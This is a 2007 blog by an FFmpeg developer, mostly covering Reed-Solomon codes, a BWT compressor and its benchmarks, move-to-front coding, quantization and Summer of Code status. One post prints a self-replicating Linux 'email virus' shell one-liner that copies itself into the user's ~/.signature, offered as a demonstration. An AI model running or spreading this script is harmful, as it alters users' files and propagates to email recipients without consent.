Lair Of The Multimedia Guru

2007-09-02

Google's Summer of Code 2007

The company which tries so hard not to be evil has again paid students this year, 900 according to Wikipedia, to work on free software. 8 of them worked on ffmpeg, and luckily the results are less disastrous than last year, when half of the 5 students who were supposed to work on ffmpeg plain disappeared and only reappeared before the deadline to convince us that they were almost finished with everything, so as to get paid …

But let's rather talk about this year's SoC. First, there were 19 students submitting 37 applications about ffmpeg. To rate these 37 applications and to prevent the high failure rate of last year, we required students to do a qualification task, that is, they had to make a not too insignificant contribution to ffmpeg to be accepted. What exactly they did was pretty much their decision, though there was a list of suggestions. As a beautiful side effect, the qualification tasks led to some nice new features for ffmpeg :).

9 of the 19 students submitted a qualification task, and all those who submitted one passed; in addition, 1 student was qualified through extensive past work on ffmpeg. From these 10 students, 2 sadly couldn't be accepted as they wanted to work on the same task as other students; in principle it would have been possible to let 2 students work on the same task, but it seemed silly. 1 wasn't accepted as his project appeared rather uninteresting and somewhat unrelated to video/audio. The 8th slot Google provided was thus given to a student who didn't submit a qualification task. Also, the actual decision of who would be accepted and who not was that of the mentors rating applications, not of any single person …

So what's the current status?

  • David's Matroska muxer has passed review and should be committed to ffmpeg svn soon
  • Kostya's RV40 decoder looks pretty good and could probably be committed to ffmpeg svn soon; actually, if Kostya wanted he could commit immediately and continue work in ffmpeg svn
  • Marco's Dirac decoder is also in good shape and there's not much keeping it from being committed; the encoder though needs more work
  • Kamil's JPEG 2000 encoder and decoder aren't in good shape yet (only 2 out of 50 encoded images can be decoded by JasPer, and only 2 of 23 reference JPEG 2000 files can be decoded by Kamil's decoder), but then please don't forget that writing an encoder and a decoder at the same time is harder than just one of the 2
  • Reynaldo's QCELP decoder is missing a working postfilter and 1/4 and 1/8 rate decoding, so it needs more work as well
  • Bobby's avfilter is in quite good shape, though it's missing well-working colorspace negotiation; it's also missing actual integration in ffmpeg.c, only ffplay.c is there
  • Bartlomiej's EAC-3 decoder hasn't been reviewed by me yet …
  • Xiaohui's MPEG-TS muxer itself also hasn't been reviewed by me yet; his patches which were submitted and which I've reviewed, though, need more work

I hope of course that all 8 students continue to work on their projects, free software in general and ffmpeg specifically!

Filed under: Uncategorized — Michael @ 22:55

2007-07-10

Forgotten code, noe and mina

libnoe

libnoe is a library to encode and decode Reed-Solomon codes which I wrote between 2002 and 2006.

noe

noe is an application which uses libnoe to generate an error correction file for some data file(s) and then use that to correct a wide variety of possible errors, including having the data randomly chopped up and reordered. “noe” btw stands for “no error”, in case you are wondering. Sadly, I've never finished the noe application.

The basic idea of how noe would work is that, first, the data itself is unchanged; changing it would be inconvenient in many situations. The error correction file is made of many not too large packets; this ensures that any reordering which happens to the error correction file can be corrected by simply searching for the packet headers and looking at some sequence number in the header. The error correction packets would contain some fingerprints of the data in the data file(s), that is, for example every 100th or 1000th bit of the data file would be stored in some error correction packet in the error correction file. With these fingerprints it's possible to detect and correct reorderings which might have happened to the data file, even if just a random subset of the error correction packets is intact. The fingerprints as well as the headers of the error correction packets would contain some small checksums to avoid confusing the code with many wrong values. Lastly, the main content of the error correction packets would simply be interleaved RS codes, or more precisely the parity part of them. Btw, in case anyone is wondering how data can get randomly chopped up and reordered, think of a broken hard disk and fragmented files.
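
To make this a bit more concrete, here is a purely hypothetical sketch of what such an error correction packet could look like; since noe was never finished, the field names and sizes below are only an illustration of the description above, not the format any actual code uses.

/* Hypothetical sketch of a noe error correction packet: sequence number,
 * checksums, data fingerprints and RS parity as described in the text.
 * All sizes and names are made up for this sketch. */
#include <stdint.h>

#define NOE_MAGIC    0x6e6f6521u   /* "noe!", made up for this sketch        */
#define FP_BITS      64            /* fingerprint bits per packet, arbitrary */
#define PARITY_BYTES 128           /* RS parity bytes per packet, arbitrary  */

struct noe_packet {
    uint32_t magic;                    /* lets packets be found again after reordering */
    uint32_t seq;                      /* position of this packet in the EC file       */
    uint32_t header_crc;               /* small checksum over the fields above         */
    uint8_t  fingerprint[FP_BITS / 8]; /* e.g. every 1000th bit of the data file       */
    uint32_t fingerprint_crc;          /* so damaged fingerprints are not trusted      */
    uint8_t  parity[PARITY_BYTES];     /* parity part of interleaved RS codewords      */
};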

Patches to finish noe are of course welcome! :)

mina

mina is the MINimal Alternative, which my lazy self did finish. It simply takes a file and produces an error correction file which is just a bunch of interleaved RS codes (the parity part of them, actually) with no header or anything. It also happily eats corrupted files and corrects them.
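
As a tiny, hedged illustration of the interleaving idea (the depth below is made up, not mina's actual parameter): codeword j is built from every DEPTH-th byte of the file, so a long burst of damage touches only a few symbols of each individual RS codeword.

#define DEPTH 255   /* number of interleaved codewords, arbitrary for this sketch */

/* Byte offset in the file of symbol s of interleaved codeword j: consecutive
 * file bytes land in different codewords, so a burst of DEPTH damaged bytes
 * costs each RS codeword only one symbol. */
static long symbol_pos(int j, int s)
{
    return (long)s * DEPTH + j;
}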

An example of mina's correction capability is below; note the images have been converted to JPEG to reduce their size and make them visible in normal browsers. Raw damaged files as tar.gz are available too (mina dz lena.pnm.mina can be used to correct them).

[image: damaged]  [image: recovered]

Source code under GPL and a GIT repository are available too; it's also quite clean and does compile :). The history though is sadly quite incomplete, like with the other forgotten code; this time it was IBM's fault, as my private CVS server with the whole history of noe was on an IBM Deathstar disk and it seems I had no backup of the RCS files (this is also one of the reasons why I make all that stuff public now, to avoid it being lost due to some other hd failure or stupidity …)

patches are welcome !!! :)

Filed under: Error Correcting Codes — Michael @ 02:14

2007-07-08

Reed Solomon codes part 2

Asymptotic complexity of the best known (to me ;) ) decoding algorithm

O(n log n + t log² t) for an (n,k) RS code over GF(n+1) and t=n-k

The proof for this is quite easy: syndrome calculation is just evaluating a polynomial at n-k points, and evaluating a polynomial (over GF(n+1)) at all points can be done with the GFFT; actually, evaluation at all points is the GFFT of the polynomial. Multiplying 2 polynomials is just 2×GFFT + componentwise multiplication + IGFFT. Finding the roots of a polynomial can likewise be done by just evaluating it at all points. The only non-trivial operation left for normal RS decoding is solving the key equation, which is equivalent to Euclid's GCD algorithm as well as Schönhage's GCD algorithm; the latter has O(t log² t) complexity (log² t == (log t)² in case that's unclear).
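
To illustrate what the syndromes are, here is a hedged C sketch that computes them by direct Horner evaluation over GF(257), for the usual construction where valid codewords have alpha^1 … alpha^t as roots; this naive version is O(n·t), the GFFT approach described above brings it down to O(n log n).

#define P 257   /* GF(257), a Fermat prime, see the next section */

static int gf_mul(int a, int b) { return a * b % P; }

/* Syndromes S_i = r(alpha^(i+1)) for i = 0..t-1 of a received word r[0..n-1],
 * with alpha = 3, a generator of GF(257)*. Plain Horner evaluation, O(n*t). */
static void syndromes(const int *r, int n, int t, int *S)
{
    int x = 3;
    for (int i = 0; i < t; i++) {
        int acc = 0;
        for (int j = n - 1; j >= 0; j--)   /* Horner: acc = r(x) */
            acc = (gf_mul(acc, x) + r[j]) % P;
        S[i] = acc;
        x = gf_mul(x, 3);                  /* next evaluation point */
    }
}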

An alternative to GF(2^x)

Normally RS codes are built over GF(2^x); that way the bits of the elements of an RS codeword have a nice 1:1 mapping to x bits which can then be stored or transmitted. But it has a big disadvantage, and that is that the GFFT for GF(y) needed for fast RS decoding is done with y-1 points, so it cannot use the well known power-of-2 style FFT algorithms, as 2^x - 1 is not a multiple of 2. The solution is to use GF(2^x+1), though note that GF(2^x+1) does not exist for all integer values of x; it only exists if 2^x+1 is a power of a prime, that is p^j. 2 obvious choices using Fermat primes are GF(2^8+1) and GF(2^16+1).
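
Here is a small, hedged sketch of why GF(2^8+1)=GF(257) is so convenient: its multiplicative group has order 256, so the plain radix-2 FFT recursion works unchanged as a number theoretic transform. 3 generates the group; the code below is a naive recursive version, not an optimized one.

#define P 257   /* GF(2^8+1) */

static int mulmod(int a, int b) { return a * b % P; }

static int powmod(int a, int e)
{
    int r = 1;
    for (; e; e >>= 1, a = mulmod(a, a))
        if (e & 1)
            r = mulmod(r, a);
    return r;
}

/* In-place length-n transform, n a power of 2 dividing 256; 3 has order 256
 * in GF(257)*, so powmod(3, 256/n) is a primitive n-th root of unity. */
static void ntt(int *x, int n)
{
    if (n == 1)
        return;
    int even[128], odd[128];
    for (int i = 0; i < n / 2; i++) {
        even[i] = x[2 * i];
        odd[i]  = x[2 * i + 1];
    }
    ntt(even, n / 2);
    ntt(odd,  n / 2);
    int w = 1, wn = powmod(3, 256 / n);
    for (int i = 0; i < n / 2; i++) {
        int t = mulmod(w, odd[i]);
        x[i]         = (even[i] + t) % P;
        x[i + n / 2] = (even[i] - t + P) % P;
        w = mulmod(w, wn);
    }
}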

How do you store 2^x+1 values in 2^x values

Trivial ;)

The data part of our RS code is specified by the user, and so it simply doesn't use the 2^x+1 th symbol; actually, it would be messy to use it. So the only problem left are the n-k parity symbols, which can trivially be transformed to not contain the annoying 2^x+1 th symbol while at the same time maintaining the property of being an RS code.

Let us assume that we have a symbol (at position y with value yv) in our k input symbols which is guaranteed to have a value yv < 2^x - n + k, that is, in practice, less than one unused bit. Let p be the RS codeword with the k-1 other data symbols 0 and the symbol at position y 1. The next step is to find all the values of the y element in our original codeword which would cause no parity symbol to have that annoying 2^x+1 th value; for encoding we simply select the yv th element of this list as the new yv element. For decoding we choose the number of elements in the list which are smaller than yv as our new element. As a last step we just need to add a scaled version of p so as to actually have the wanted yv element, avoiding the nasty too-large elements while also still having an RS code.

Filed under: Error Correcting Codes — Michael @ 20:31

Reed Solomon codes

What is a Reed-Solomon code

Let's assume we have k values out of which we want to build a Reed-Solomon code. To do this we imagine that our k values specify the height (=y) of k points with x from 0 to k-1. Now we really have just made a silly graph of our data. Next we find an order k-1 polynomial which goes exactly through these points; this polynomial is unique, no other polynomial of order k-1 will go through these points. And last we just evaluate this polynomial at the points 0 … n-1; these n values are a Reed-Solomon code, simple isn't it? Note the first k values are just our input data values, which we already know.
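
Here is a minimal, unoptimized sketch of that construction in C. It assumes arithmetic in the prime field GF(257) purely to keep the modular math trivial (any sufficiently large field works, see the practice section below); it interpolates the unique order k-1 polynomial through the data points with Lagrange's formula and evaluates it at 0 … n-1.

#include <stdio.h>

#define P 257   /* prime field GF(257), used here only to keep the math simple */

static int mulmod(int a, int b) { return a * b % P; }

static int powmod(int a, int e)
{
    int r = 1;
    for (; e; e >>= 1, a = mulmod(a, a))
        if (e & 1)
            r = mulmod(r, a);
    return r;
}

static int inv(int a) { return powmod(a, P - 2); }   /* Fermat: a^(P-2) = 1/a */

/* Evaluate at x the unique order k-1 polynomial through the points
 * (0, data[0]) ... (k-1, data[k-1]), using Lagrange's interpolation formula. */
static int rs_symbol(const int *data, int k, int x)
{
    int sum = 0;
    for (int i = 0; i < k; i++) {
        int term = data[i];
        for (int j = 0; j < k; j++)
            if (j != i)
                term = mulmod(term, mulmod((x - j + P) % P, inv((i - j + P) % P)));
        sum = (sum + term) % P;
    }
    return sum;
}

int main(void)
{
    int data[4] = {10, 20, 30, 42};   /* k = 4 data values                       */
    for (int x = 0; x < 8; x++)       /* n = 8; the first 4 outputs are the data */
        printf("%d ", rs_symbol(data, 4, x));
    printf("\n");
    return 0;
}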

Correcting erasures with RS codes

We now can make RS codes, but how can we correct erasures? Let's assume there are t erasures (erasures are errors where the location of the error is known). That means we know n-t values of our polynomial, and if t≤n-k then we can just find the remaining values by finding the (unique) polynomial which goes through the n-t known values. It's also easy to show (just imagine that you only have k-1 of your k data values) that if t>n-k then no code can correct the erasures, so RS codes are optimal in that sense.

Correcting errors with RS codes

But what if we don't know where the errors are? Well, just try all possible error locations of 0, 1,…,t errors; yes, this is not practical, but it's nice to prove the error correcting capability. Now if we have t actual errors and we guess their locations correctly, then we will find our correct polynomial and can correct the errors if we have at least k values left. The only thing we now need to find out is how large t can be so that we can't find a wrong polynomial before we find the correct one. The answer is trivial actually: a polynomial of order k-1 is uniquely defined by k points, so if we have t errors and guess all t error locations wrong then we effectively kill 2t points, and if there are fewer than k left then we could end up with a wrong polynomial. So we can correct (n-k)/2 errors. More generally, Reed-Solomon codes can correct 2*errors + erasures as long as that's ≤ n-k.

Hamming distance

The Hamming distance is n-k+1; the proof is trivial (a smaller distance would contradict the error correcting capability).

Practice

The above is true if our data and code values are real, rational or integer numbers (and others), but these are quite difficult to handle in reality as they aren't bounded. Luckily all the above also works over finite fields, so we can just work with polynomials over GF(256) or similar, which has the nice property that you can store such values in bytes, while integers and reals can be quite hard to store in finite storage space.

Filed under: Error Correcting Codes — Michael @ 00:28

2007-07-06

Forgotten code, VGA600

Low resolution graphics modes like 320×200 are displayed with doublescan so that each logical line is drawn twice; that way 320×200 is drawn with 400 lines, which looks better than 200 on a modern CRT monitor. The reason is that modern CRT monitors are designed to be able to display 1000 or more lines, and if they are fed with just 200 there would be huge black bars between these 200 thin lines; with 400 lines it's better but still not good.

VGA600 is a little DOS TSR which I wrote in 1996/1997 to solve this problem. VGA600 does that by monitoring the state of various VGA registers, and if it detects that the current graphics or text mode can be improved, it improves it by increasing the number of lines and the dot clock. So for example 320×200 would be displayed with 600 or 800 lines (which one it is depends on the configuration).

Source code under GPL, README and binary are available too

I've extensively tested VGA600 with Doom and Quake on an ET4000 PCI card a long time ago ;)

Patches welcome, especially ones porting this to linux and modern vga cards :)

Filed under: Off Topic — Michael @ 01:53

2007-06-20

Unix email viruses, do they exist?

Seeing all the thousands of email viruses in my spam folder, all probably specific to Windows, I am wondering why I haven't seen any for Linux. Are Linux users too intelligent to copy and paste unknown code into their terminal or execute an attached executable?

It's not hard to write an email virus for Linux; if you don't believe me, see the example below. Note, the code is public domain, I don't claim any copyright on it. Standard disclaimer: I am not responsible for the consequences of using this code for anything, even less so modified variants of it. I am just providing this for scientific purposes! Do not use it for any evil!


echo ' echo echo `echo -e \\\47;cat /tmp/t;echo -e \\\47`\>/tmp/t\;. /tmp/t>>~/.signature'>/tmp/t;. /tmp/t

Filed under: Off Topic — Michael @ 01:31

2007-06-18

mnzip

I always wanted to write my own general purpose compressor; a short while ago I actually did. It's based on the BWT + the MTF variant described in yesterday's blog post + Snow's/FFV1's range coder with a state transition table borrowed from bbb/paq8. Source code under GPL is of course available too.

compressed file sizes of the Canterbury Corpus

                          alice29.txt  asyoulik.txt  cp.html  fields.c  grammar.lsp  kennedy.xls  lcet10.txt  plrabn12.txt   ptt5    sum  xargs.1
bzip2 1.0.3                     43202         39569     7624      3039         1283       130280      107706        145577  49759  12909     1762
7zip 4.43 beta                  48555         44606     7692      3076         1350        50904      119569        165462  42153   9619     1860
bbb ver. 1                      40839         37818     7736      3253         1349        76523      101117        135829  44816  12593     1792
mnzip r32 with plain MTF        42698         39286     7572      2962         1227        19804      105883        143634  50624  12591     1698
mnzip r32                       40950         37835     7431      2983         1237        19287      101140        137191  45604  12428     1699

Time needed to compress

                alice29.txt  asyoulik.txt  lcet10.txt  plrabn12.txt   cp.html  fields.c  grammar.lsp  kennedy.xls       ptt5       sum   xargs.1
bzip2 1.0.3        0m0.166s      0m0.133s    0m0.533s      0m0.633s  0m0.047s  0m0.037s     0m0.007s     0m1.062s   0m0.151s  0m0.056s  0m0.006s
7zip 4.43 beta     0m0.539s      0m0.417s    0m1.732s      0m2.161s  0m0.070s  0m0.035s     0m0.019s     0m6.048s   0m1.402s  0m0.105s  0m0.022s
bbb ver. 1         0m2.675s      0m2.271s    0m7.455s      0m8.599s  0m0.559s  0m0.344s     0m0.230s    0m17.446s  0m45.407s  0m0.813s  0m0.235s
mnzip r32          0m0.273s      0m0.206s    0m0.951s      0m1.099s  0m0.031s  0m0.012s     0m0.006s     0m3.545s   0m1.173s  0m0.051s  0m0.006s

time needed to decompress

                alice29.txt  asyoulik.txt  lcet10.txt  plrabn12.txt   cp.html  fields.c  grammar.lsp  kennedy.xls       ptt5       sum   xargs.1
bzip2 1.0.3        0m0.063s      0m0.049s    0m0.177s      0m0.222s  0m0.007s  0m0.003s     0m0.002s     0m0.210s   0m0.053s  0m0.009s  0m0.003s
7zip 4.43 beta     0m0.033s      0m0.027s    0m0.066s      0m0.085s  0m0.009s  0m0.011s     0m0.007s     0m0.099s   0m0.043s  0m0.016s  0m0.006s
bbb ver. 1         0m2.265s      0m1.918s    0m6.015s      0m6.916s  0m0.511s  0m0.332s     0m0.231s    0m13.492s   0m6.660s  0m0.715s  0m0.237s
mnzip r32          0m0.073s      0m0.061s    0m0.215s      0m0.261s  0m0.010s  0m0.005s     0m0.003s     0m0.441s   0m0.155s  0m0.017s  0m0.002s

Options used were -9 for bzip2, -mx=9 for 7zip, and f for bbb to use the fast but memory hungry mode (this doesn't affect the compression rate for bbb). The benchmark scores are just based on single runs, no proper mean, so don't take them too seriously, and I hope I've not messed up the file order ;)

Patches are welcome!

Filed under: Entropy Coding — Michael @ 01:20

2007-06-16

Move to front coder/transform

First a little explanation about what a move to front coder is. It's a reversible transform which remaps each symbol to an index into a table which initially contains (0,1,2,3,…), and every time a symbol is used it's moved to the front of the table.

Example: input: “to be or not to be”, initial table: (abcdefghijklmnopqrstuvwxyz). For the first ‘t’ we output 19 as it's the 19th entry in the table (counting from 0), and move it to the front to build the new table (tabcdefghijklmnopqrsuvwxyz). The complete list of steps looks like:

abcdefghijklmnopqrstuvwxyz  19(t)
tabcdefghijklmnopqrsuvwxyz  15(o)
otabcdefghijklmnpqrsuvwxyz  27( )
 otabcdefghijklmnpqrsuvwxyz 4(b)
b otacdefghijklmnpqrsuvwxyz 7(e)
eb otacdfghijklmnpqrsuvwxyz 2( )
 ebotacdfghijklmnpqrsuvwxyz 3(o)
o ebtacdfghijklmnpqrsuvwxyz 19(r)
ro ebtacdfghijklmnpqsuvwxyz 2( )
 roebtacdfghijklmnpqsuvwxyz 17(n)
n roebtacdfghijklmpqsuvwxyz 3(o)
on rebtacdfghijklmpqsuvwxyz 6(t)
ton rebacdfghijklmpqsuvwxyz 3( )
 tonrebacdfghijklmpqsuvwxyz 1(t)
t onrebacdfghijklmpqsuvwxyz 2(o)
ot nrebacdfghijklmpqsuvwxyz 2( )
ot nrebacdfghijklmpqsuvwxyz 6(b)
bot nreacdfghijklmpqsuvwxyz 6(e)

As you can see, the MTF transform will generally favor small numbers on “non random” data. On its own it's not too useful for compression, but together with the BWT and a simple order 0 entropy coder it's a pretty good general purpose compressor.
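
For reference, a tiny sketch of the forward MTF transform over bytes; this is just the textbook version of the description above, not code taken from mnzip.

#include <string.h>

/* Forward MTF over bytes: out[i] is the index of in[i] in the table,
 * and the symbol is then moved to the front of the table. */
static void mtf_encode(const unsigned char *in, int n, unsigned char *out)
{
    unsigned char table[256];
    for (int i = 0; i < 256; i++)
        table[i] = i;                    /* initial table 0,1,2,3,...    */

    for (int i = 0; i < n; i++) {
        int idx = 0;
        while (table[idx] != in[i])      /* index of the current symbol  */
            idx++;
        out[i] = idx;
        memmove(table + 1, table, idx);  /* move the symbol to the front */
        table[0] = in[i];
    }
}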

Now to the actual reason why I am writing this blog entry: can you use the symbol which the index represents as context for the entropy coder coding the index? You say no, because that's like already knowing the index together with the table.

Well if you think so, you are wrong; the trick is not to know the table :)

First, to compress our data we run an MTF transform over it, and we store the MTF table as it is after the whole transform (this is not strictly needed but simplifies things). Next we encode the indexes from the end to the beginning, each time moving the zero entry of our table to the position pointed to by the index; each time we know the symbol before the index and so can use it as context. This really is nothing else than the MTF coder in reverse.

An example: we start with the table (ebot nracdfghijklmpqsuvwxyz), the first symbol is ‘e’ and the corresponding index is 6 (we know this from the forward MTF pass), so we store 6 with context ‘e’ and move e to the 6th place to get the table (bot nreacdfghijklmpqsuvwxyz); the next steps are all just the same as in the MTF example above, just in reverse.

Decompression is pretty much the same: read the table (again this isn't needed but it's simpler as it avoids a 2nd pass over the data), then take the value from position 0 of the table and use it as context to decode the next index; after that, use the index to move the entry from position 0 to its new position, and repeat until you are out of input data.
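
Here is a hedged sketch of the backward pass on the compression side; the entropy coder is left out (encode_index() below is a made-up stub), the point is just how the (context, index) pairs are produced and how the table is unwound, exactly reversing the forward MTF.

#include <stdio.h>
#include <string.h>

/* Stub standing in for the real range coder, made up for this sketch. */
static void encode_index(int context_symbol, int index)
{
    printf("context '%c' -> index %d\n", context_symbol, index);
}

/* Backward pass over the MTF output idx[0..n-1]; "table" must be the MTF table
 * as it is after the forward transform. Each index is coded with the symbol it
 * stands for as context, and the table is unwound one step at a time. */
static void code_indexes_backwards(unsigned char *table, const unsigned char *idx, int n)
{
    for (int i = n - 1; i >= 0; i--) {
        unsigned char sym = table[0];       /* the symbol idx[i] stands for    */
        encode_index(sym, idx[i]);          /* context = symbol, value = index */
        memmove(table, table + 1, idx[i]);  /* undo the move-to-front:         */
        table[idx[i]] = sym;                /* put sym back at position idx[i] */
    }
}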

Filed under: Entropy Coding — Michael @ 23:09

2007-06-07

Quantization of a bunch of scalar variables

You have a few uniformly distributed independent scalar variables; how do you optimally quantize them? Simply each one independently by uniform scalar quantization? Wrong; this is, likely to the surprise of the reader, not optimal.

One way to see the suboptimality is to look at what independent uniform scalar quantization does if we have 2 variables: it splits the plane into squares and represents all points within a square by its center. How can we do better? Just split the plane into hexagons; both the worst case and the average quantization error decrease. For cells of area 1, the worst case for the square is 2^0.5/2=~0.7071, and the worst case for the hexagon is 12^0.25/3=~0.6204.
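
For the curious, a quick derivation of the hexagon number, assuming (as for the square) a cell of area 1; the worst case is the distance from the cell center to a corner, i.e. the circumradius r of the regular hexagon:

\frac{3\sqrt{3}}{2}\,r^2 = 1 \quad\Rightarrow\quad r = \sqrt{\frac{2}{3\sqrt{3}}} = \frac{12^{1/4}}{3} \approx 0.6204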

Another way to see the suboptimality is to look at the worst case point, which in case of the square lies equidistant to the centers of 4 squares, while with hexagons it just lies equidistant to the centers of 3 hexagons. So there are just 3 redundant ways to quantize it instead of 4.

If we consider the (uniform scalar) quantization of the first variable of the 2, then we can simply improve the worst case, which lies exactly between 2 values of the first variable, by making use of the useless least significant bit. More exactly, add half a quantization step to the second variable if the first was quantized to an odd value; this interestingly turns out to be equivalent to using hexagons for quantization, though the hexagons are a little squished here compared to the optimal case with regular hexagons.
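
A tiny hedged sketch of that trick in C: plain uniform scalar quantization plus the half-step offset on the second variable whenever the first index is odd. The step size q and the rounding convention are arbitrary choices for this sketch.

#include <math.h>

/* Quantize (x, y) with step q, offsetting y by half a step when xi is odd. */
static void quantize_pair(double x, double y, double q, int *xi, int *yi)
{
    *xi = (int)lround(x / q);
    double off = (*xi & 1) ? 0.5 : 0.0;   /* half-step offset on odd xi */
    *yi = (int)lround(y / q - off);
}

static void dequantize_pair(int xi, int yi, double q, double *x, double *y)
{
    double off = (xi & 1) ? 0.5 : 0.0;
    *x = xi * q;
    *y = (yi + off) * q;
}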

I've also written a little test program in case anyone wants to play with this quantization stuff.

Filed under: Uncategorized — Michael @ 02:28

2007-05-22

storing xiph codecs in containers other than ogg

Storing Vorbis, Theora and all the other Xiph codecs in containers other than Ogg is in principle not difficult; the primary problem is just that Xiph codecs have several global headers, while most generic containers expect just 1 or no global header. Mapping from several (3 normally) to 1 can be done in many ways, and as there is no official recommendation from Xiph which says how to do this, people have come up with various incompatible solutions. Furthermore people have done other insane things like storing Vorbis in Ogg and that in AVI and similar very very broken things …

So a long time ago I decided to write a proposal for a recommendation on how to store Xiph codecs in containers other than Ogg; sadly it was mostly ignored at the time of its writing.

But yesterday someone from Xiph contacted me and Alex and asked if we were interested in working on this oggless recommendation :), which led to The oggless wiki page and a posting on ogg-dev. So if you want to contribute to this / discuss it (on ogg-dev), now is the right time …

Filed under: Container Formats,FFmpeg — Michael @ 21:32